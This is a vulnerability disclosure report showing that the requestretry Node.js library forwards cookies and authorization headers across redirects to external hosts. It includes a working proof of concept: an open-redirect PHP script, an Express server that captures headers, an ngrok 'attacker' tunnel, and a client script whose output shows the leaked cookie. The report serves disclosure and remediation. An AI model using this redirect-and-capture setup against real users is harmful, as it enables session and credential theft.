> Reported on Feb 10 2022 | Timothee Desurmont
Vulnerability type: CWE-200
Cookies are leaked to external sites.
request(`${mysite}/redirect.php?url=${attacker}/`, options)
When fetching a (Redirect) url containing a link to an external site in the params ?url=${attacker}
, the users Cookies are leaked to the third party application:
{
headers: {
host: '304e-92-98-215-185.ngrok.io',
cookie: 'ajs_anonymous_id=1234567890"',
referer:
'http://192.168.2.31/redirect.php?url=http://304e-92-98-215-185.ngrok.io/',
'x-forwarded-for': '92.98.215.185',
'x-forwarded-proto': 'http',
'accept-encoding': 'gzip'
}
}
Headers should be “sanitized”.
We will run an appache server on port 80 that will redirect all incoming requests to the url specified in the params (mysite).
We will run an expressjs server on port 3000 that will represent the external site (attacker).
To prove that the Cookie are leaked to external sites, the attacker url needs to be different than mysite; we will use ngrok to create a tcp tunnel for port 3000 and provide an internet address for the attacker site.
/var/www/html/
// /var/www/html/redirect.php
<?php
$url=$_GET["url"];
header("Location: $url");
exit;
?>
sudo apt-get update
sudo apt-get install php libapache2-mod-php
sudo systemctl restart apache2
// ~/test/server.js
const express = require('express')
const app = express()
app.get('/', function (req, res) {
console.log(req.headers);
res.status(200).json({"headers": req.headers});
})
app.listen(3000)
console.log('listening on port 3000');
npm install express
node server.js
sudo apt-get install -y ngrok-server
ngrok http 3000
Session Status online
Account Timothee Desurmont (Plan: Free)
Update update available (version 2.3.40, Ctrl-U to update)
Version 2.3.35
Region United States (us)
Web Interface http://127.0.0.1:4040
Forwarding http://304e-92-98-215-185.ngrok.io -> http://localhost:3000
Forwarding https://304e-92-98-215-185.ngrok.io -> http://localhost:3000
Do not forget to replace mysite url with your local ip and attacker url with the one provided by ngrok.
// ~/test/poc.js
var request = require('requestretry');
const mysite = "http://192.168.2.31";
const attacker = "http://304e-92-98-215-185.ngrok.io";
const options = {
method: 'GET',
headers: {
'Content-Type': 'application/json'
,'Cookie': 'ajs_anonymous_id=1234567890"',
"Authorization": "Bearer eyJhb12345abcdef"
}
};
request(`${mysite}/redirect.php?url=${attacker}/`, options)
.then(function (response) {
console.log(JSON.parse(response.body));
})
.catch(function(error) {
console.log(error)
})
npm install requestretry
node poc.js
The request from poc.js gets redirected by our apache server (mysite) to the expressjs server (attackers site) which then send back the headers as a response. We can see that the Cookie of the victim have been leaked to the attacker.
{
headers: {
host: '304e-92-98-215-185.ngrok.io',
cookie: 'ajs_anonymous_id=1234567890"',
referer:
'http://192.168.2.31/redirect.php?url=http://304e-92-98-215-185.ngrok.io/',
'x-forwarded-for': '92.98.215.185',
'x-forwarded-proto': 'http',
'accept-encoding': 'gzip'
}
}
Access Control: Hijack of victims account.
The attacker can steal the user’s credentials and then use these credentials to access the legitimate web site.
If the redirected url is different from the url domain, the Cookie should be removed from the header.